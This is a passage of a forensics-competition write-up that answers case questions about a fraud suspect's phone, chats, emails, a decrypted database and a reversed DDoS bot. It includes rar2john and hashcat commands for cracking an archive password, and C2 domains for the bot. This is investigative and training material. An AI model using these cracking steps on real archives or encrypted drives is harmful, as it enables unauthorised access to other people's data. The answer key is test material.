data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106211846725.png" srcset="" alt="image-20201106211846725"></p><p>在检材四中找不到文件,又因为他是从<code>192.168.184.128</code>下载获取<code>we.tar.gz</code>,所以我们从检材一中找到文件,计算<code>SHA256</code>:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107112119784.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107112119784.png" srcset="" alt="image-20201107112119784"></p><blockquote><ol start="73"><li><p>请分析并提取,嫌疑人所用的手机的<code>IMEI </code>号码:(<strong>C</strong>)</p><p><code> A. 352021062748965 B. 352021062748966 C. 352021062748967 D. 
352021062748968</code></p></li></ol></blockquote><blockquote><p><strong>国际移动设备识别码</strong>(<strong>International Mobile Equipment Identity</strong>,<strong>IMEI</strong>),即通常所说的手机序列号、手机“串号”,用于在移动电话网络中识别每一部独立的手机等移动通信设备,相当于移动电话的身份证。</p></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106222958537.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201106222958537.png" srcset="" alt="image-20201106222958537"></p><blockquote><ol start="74"><li><p>嫌疑人是通过何种方式联系到售卖恶意程序的卖家的:(<strong>B</strong>)</p><p>A.微信 B.QQ C.短信 D.邮件</p></li><li><p>嫌疑人和卖家的资金来往是通过何种方式:(<strong>A</strong>)</p><p>A.微信 B.QQ C. 银行转账 D.支付宝</p></li><li><p>嫌疑人在犯罪过程中所使用的 <code>QQ</code> 账号为:(<strong>A</strong>)</p><p><code>A. 1649840939 B. 1137588348 C. 364505251 D. 1722629449 </code></p></li><li><p>卖家所使用的微信账号 ID 为:(<strong>C</strong>)</p><p><code> A. refrain_C B. flame_guan C. chao636787 D. sword19880521</code></p></li><li><p>嫌疑人下载了几个恶意程序到本机:(<strong>B</strong>)</p><p><code> A. 1 B. 2 C. 3 D. 
4</code></p></li></ol></blockquote><p>我们在火眼取证中找到手机备份,然后添加到检材,然后分析,密码??试一下检材4桌面上的``niuroumian6`!对了!</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107124338615.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107124338615.png" srcset="" alt="image-20201107124338615"></p><p>然后我们翻一翻他的社交~看看<code>QQ</code>……两个号,一个号好没营养……看看另外一个,<code>woc</code>,大型犯罪现场!!!发现一些关键信息,我们做个笔记:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125224818.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125224818.png" srcset="" alt="image-20201107125224818"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125240145.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125240145.png" srcset="" alt="image-20201107125240145"></p><p>再瞅瞅微信,发现记录和<code>QQ</code>对应:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125640097.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107125640097.png" srcset="" alt="image-20201107125640097"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107130016567.png" class="lazyload" 
data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107130016567.png" srcset="" alt="image-20201107130016567"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107130027391.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107130027391.png" srcset="" alt="image-20201107130027391"></p><blockquote><ol start="79"><li><p>恶意程序被嫌疑人保存在什么位置:(<strong>D</strong>)</p><p> <code>A.D:/DOWNLOAD B. C:/USER C. C:/ D.D:/ </code></p></li><li><p>恶意程序是使用什么工具下载到本地的:(<strong>C</strong>)</p><p><code> A. Chrome B. Internet Explorer C. edge D.迅雷</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131020480.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131020480.png" srcset="" alt="image-20201107131020480"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131312244.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131312244.png" srcset="" alt="image-20201107131312244"></p><blockquote><ol start="81"><li>嫌疑人是什么时间开始对受害者实施诈骗的:(<strong>C</strong>)</li></ol><p><code> A. 2019-07-13 19:14:44 B. 2019-07-13 19:24:44 C. 2019-07-13 19:04:44 D. 
2019-07-13 19:44:44</code></p></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131606833.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131606833.png" srcset="" alt="image-20201107131606833"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131624592.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107131624592.png" srcset="" alt="image-20201107131624592"></p><blockquote><ol start="82"><li><p>请提取受害者的银行卡信息,银行卡账号为:(<strong>B</strong>)</p><p><code> A. 6225000088217563457 B. 6225000088257563456</code></p><p><code> C. 6225000088257563458 D. 6225000088257563459</code></p></li></ol></blockquote><p>在电脑里面的备份平台里面有一台虚拟机,搞出来,有密码???搞他!我们先<a href="https://www.cnblogs.com/lcl0421/p/9227805.html">修改密码</a>,在<code>/home/admin888/fund/</code>文件夹下发现<code>sqlite</code>数据库,我们导出来~</p><blockquote><p><code>$ scp [email protected]:/home/admin888/fund/db.sqlite3 ./db.sqlite3</code></p><p><code>$ python3 -m http.server 2021</code></p></blockquote><p>然后根据手机号定位受害人是赵昊,数据库里面查看银行卡号:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154313948.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154313948.png" srcset="" alt="image-20201107154313948"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154258903.png" class="lazyload" 
data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154258903.png" srcset="" alt="image-20201107154258903"></p><blockquote><ol start="83"><li><p>请综合分析,嫌疑人第一次入侵目标服务器的行为发生在:(<strong>C</strong>)</p><p><code> A. 2019-07-13 16:17:30 B. 2019-07-13 16:17:32 C. 2019-07-13 16:17:35 D. 2019-07-13 16:17:38</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154615513.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107154615513.png" srcset="" alt="image-20201107154615513"></p><blockquote><ol start="84"><li><p>请综合分析,嫌疑人入侵服务所使用的登陆方式为:(<strong>B</strong>)</p><p> A. SSH 密码登陆 B. SSH 密钥登陆 C. 连接后门程序 D.FTP 登陆</p></li></ol></blockquote><p>我们之前在检材四中的xshell数据文件中见到了密钥文件:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107155204586.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201107155204586.png" srcset="" alt="image-20201107155204586"></p><blockquote><ol start="85"><li><p>可知嫌疑人应对外发送过邮件,请分析并找到发出的邮件,可知邮件的发送时间为:(<strong>B</strong>)</p><p><code> A. 2019-07-13 17:55 B. 2019-07-14 17:56 C. 2019-07-14 17:57 D. 2019-07-14 17:58</code></p></li><li><p>可知嫌疑人应对外发送过邮件,请分析并找到发出的邮件,可知邮件收件人为:(<strong>B</strong>)</p><p><code> A. [email protected] B. [email protected] C. [email protected] D. 
[email protected]</code></p></li></ol></blockquote><p>这个题目是真的骚,我们在前面有发现,他下载过<code>Foxmail</code>,于是我们查看<code>Foxmail</code>使用痕迹,然后把时间定位到<code>2019-07-13 17:52:20</code>,所以一般就选择A,但是是错的……因为他不一定用<code>Foxmail</code>发文件。所以我们换一个思路,在检材三中(嫌疑人使用的VPN服务器)有数据包,既然他发邮件,那么一定走了代理,所以我们再研究研究那个检材3的那两个数据包。这里有一个姿势点:</p><blockquote><p>常用的电子邮件协议有<code>SMTP、POP3、IMAP4</code>它们都隶属于<code>TCP/IP</code>协议簇.</p></blockquote><p>所以我们数据包里面直接找这几个协议:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108094246421.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108094246421.png" srcset="" alt="image-20201108094246421"></p><blockquote><ol start="87"><li><p>请重构被入侵的网站,可知该网站后台管理界面的登陆用户名为:(<strong>C</strong>)</p><p><code> A. root B Administered C. admin D. user</code></p></li></ol></blockquote><p>重构网站需要先恢复数据库,我们再检材2中有加密程序,有加密过的数据库。所以我们开始老本行!逆!</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108111125565.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108111125565.png" srcset="" alt="image-20201108111125565"></p><p>思路很简单,上<code>exp</code>:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> string <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">with</span> <span 
class="built_in">open</span>(<span class="string">"db.encrypt"</span>,<span class="string">'rb'</span>) <span class="keyword">as</span> f:</span><br><span class="line"> s=f.read()</span><br><span class="line"></span><br><span class="line">r=<span class="built_in">bytes</span>([((x^<span class="number">0xaa</span>)+<span class="number">256</span>-<span class="number">66</span>)%<span class="number">256</span> <span class="keyword">for</span> x <span class="keyword">in</span> s])</span><br><span class="line"></span><br><span class="line"><span class="keyword">with</span> <span class="built_in">open</span>(<span class="string">'db'</span>, <span class="string">'wb'</span>) <span class="keyword">as</span> inp:</span><br><span class="line"> inp.write(r)</span><br><span class="line"></span><br></pre></td></tr></table></figure><p>然后计算<code>SHA256</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108112522288.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108112522288.png" srcset="" alt="image-20201108112522288"></p><p>我们在检材4的<code>C</code>盘中看到了一个待挂载的硬盘:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154253039.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154253039.png" srcset="" alt="image-20201108154253039"></p><p>然后双击,显示<code>Bitlocker</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154511990.png" class="lazyload" 
data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154511990.png" srcset="" alt="image-20201108154511990"></p><p>我们打开<code>Bitlocker</code>:<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154544420.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154544420.png" srcset="" alt="image-20201108154544420"></p><p>现在我们缺少密码……还记得前面在翻<code>QQ</code>的时候看到的那个消息嘛,提示一下:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154812496.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108154812496.png" srcset="" alt="image-20201108154812496"></p><p>我们再根据他的<code>QQ</code>号和上面这个内容,可以猜到,在前面我们分析的邮件正是他用来备份密码的右键,我们复原一下邮件:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108162121999.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108162121999.png" srcset="" alt="image-20201108162121999"></p><p>发现4个<code>EML</code>文件,导出以后,直接下载<img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108162907437.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201108162907437.png" srcset="" 
alt="image-20201108162907437"></p><p>但是有密码!!!我们联想检材4桌面上的字典和<code>niuroumian6</code>,我们尝试用这个字典来爆破压缩包。这里爆破用的工具是开膛手<code>john</code>和<code>hashcat</code>:</p><blockquote><p><code>$ rar2john.exe BitLocker.rar </code>BitLocker.rar:$rar5$16$0c231f49ba3ded4bc944dee58f2be760$15$2a5c3ec4a5380b7a9d5517cc8ba386b6$8$07400e39e08a2e03`</p><p><code>$ hashcat.exe -m 13000 -a 0 $rar5$16$0c231f49ba3ded4bc944dee58f2be760$15$2a5c3ec4a5380b7a9d5517cc8ba386b6$8$07400e39e08a2e03 新建文本文档.txt</code></p></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210507588.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210507588.png" srcset="" alt="image-20201110210507588"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210522337.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210522337.png" srcset="" alt="image-20201110210522337"></p><p>打开密钥备份文件,用恢复密钥成功解锁硬盘:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210731636.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201110210731636.png" srcset="" alt="image-20201110210731636"></p><p>查看<code>db</code>文件,和我们前面逆向加密程序恢复的<code>db</code>一样。</p><p>里面还有那个网站的……所有东西,那我们把这个<code>dump</code>出来,:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111111604097.png" class="lazyload" 
data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111111604097.png" srcset="" alt="image-20201111111604097"></p><blockquote><ol start="88"><li><p>Rebuild the compromised website, log in to its backend management interface and preserve the evidence. Which of the following is NOT in the left navigation bar of the site's home page: (<strong>D</strong>)</p><p> A. Information list B. Fund management C. Fund data D. Member information</p></li><li><p>Analysis shows that the suspect planted a ransomware program on the target server. Decrypt the encrypted database in evidence item 2;</p><p> its <code>sha256</code> value is: (<strong>A</strong>)</p><p><code>A. 8dcf2f71482bb492b546eec746c714be9324ea254778bf5cbb9e5115b30c77a2</code></p><p><code>B. 8dcf2f71482bb492b546eec746c714be9324ea254778bf5cbb9e5115b30c77a3</code></p><p><code>C. 8dcf2f71482bb492b546eec746c714be9324ea254778bf5cbb9e5115b30c77a4</code></p><p><code>D. 8dcf2f71482bb492b546eec746c714be9324ea254778bf5cbb9e5115b30c77a5</code></p></li></ol></blockquote><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111125021116.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111125021116.png" srcset="" alt="image-20201111125021116"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111112517872.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201111112517872.png" srcset="" alt="image-20201111112517872"></p><blockquote><ol start="90"><li><p>Analysis shows that the suspect planted a <code>ddos</code> program on the target server. Functional analysis of that program shows that it copies itself to which directory on the target machine: (<strong>B</strong>)</p><p><code> A. /etc B. /lib C. /root D. /tmp</code></p></li><li><p>Analysis shows that the suspect planted a ddos program on the target server. Functional analysis of that program shows that its controller addresses are (multiple choice): (<strong>AD</strong>)</p><p><code>A. shaoqian.f3322.net B. shaoqian.f3344.net C. gh.dsaj3a2.org D. 
gh.dsaj2a1.org</code></p></li></ol></blockquote><p>From the chat records it is easy to see that the <code>ddos</code> program is <code>runit</code>. We locate the file in evidence item 4 and reverse it...</p><p>In the main function we see some garbled strings, preceded by a decryption function. We step into it and decrypt them:</p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112131329103.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112131329103.png" srcset="" alt="image-20201112131329103"></p><p><img src="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112131341467.png" class="lazyload" data-srcset="/images/%E7%AC%AC%E4%B8%80%E5%B1%8A%E9%95%BF%E5%AE%89%E6%9D%AF%E7%94%B5%E5%AD%90%E5%8F%96%E8%AF%81%E7%AB%9E%E8%B5%9B/image-20201112131341467.png" srcset="" alt="image-20201112131341467"></p><p>Then we look for the other encrypted data in the program and write a script to decode it:</p><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><span class="line">enc=[<span class="string">"m7A4nQ_/nA"</span>,<span class="string">"m [(n3"</span>,<span class="string">"m6_6n3"</span>,<span class="string">"m4S4nAC/n&ZV"</span>,<span class="string">"m.[$n__#4%\\C"</span>,<span class="string">"m.[$n3"</span>,<span class="string">"m4S4nAC/nA"</span>,<span class="string">"m4S4nAC/n&ZV"</span>,<span class="string">"m.[$n__#4%\\C"</span>,<span class="string">"m.[$n3"</span>]  <span class="comment"># encoded strings pulled from the binary</span></span><br><span 
class="line">a=[<span class="number">0x36</span>,<span class="number">0x46</span>,<span class="number">0x36</span>,<span class="number">0x7B</span>,<span class="number">0x1C</span>,<span class="number">0x19</span>,<span class="number">0x27</span>,<span class="number">0x34</span>,<span class="number">0x2D</span>,<span class="number">0x55</span>,<span class="number">0x1B</span>,<span class="number">0x50</span>,<span class="number">0x42</span>,<span class="number">0x27</span>,<span class="number">0x5A</span>,<span class="number">0x70</span>,<span class="number">0x23</span>,<span class="number">0x1C</span>,<span class="number">0x29</span>,<span class="number">0x33</span>,<span class="number">0x54</span>,<span class="number">0x19</span>,<span class="number">0x23</span>,<span class="number">0x6E</span>,<span class="number">0x34</span>,<span class="number">0x17</span>,<span class="number">0x45</span>,<span class="number">0x5C</span>,<span class="number">0x41</span>,<span class="number">0x79</span>,<span class="number">0x59</span>,<span class="number">0x26</span>,<span class="number">0x7F</span>,<span class="number">0x46</span>,<span class="number">0x23</span>,<span class="number">0x32</span>,<span class="number">0x47</span>]</span><br><span class="line">b=[<span class="number">0x25</span>,<span class="number">0x2A</span>,<span class="number">0x1C</span>,<span class="number">0x22</span>,<span class="number">0x32</span>,<span class="number">0x52</span>,<span class="number">0x5C</span>,<span class="number">0x73</span>,<span class="number">0x20</span>,<span class="number">0x70</span>,<span class="number">0x17</span>,<span class="number">0x5A</span>,<span class="number">0x46</span>,<span class="number">0x56</span>,<span class="number">0x7C</span>,<span class="number">0x2</span>,<span class="number">0x76</span>,<span class="number">0x76</span>,<span class="number">0x6</span>,<span class="number">0x3A</span>,<span class="number">0x32</span>,<span class="number">0x5B</span>,<span 
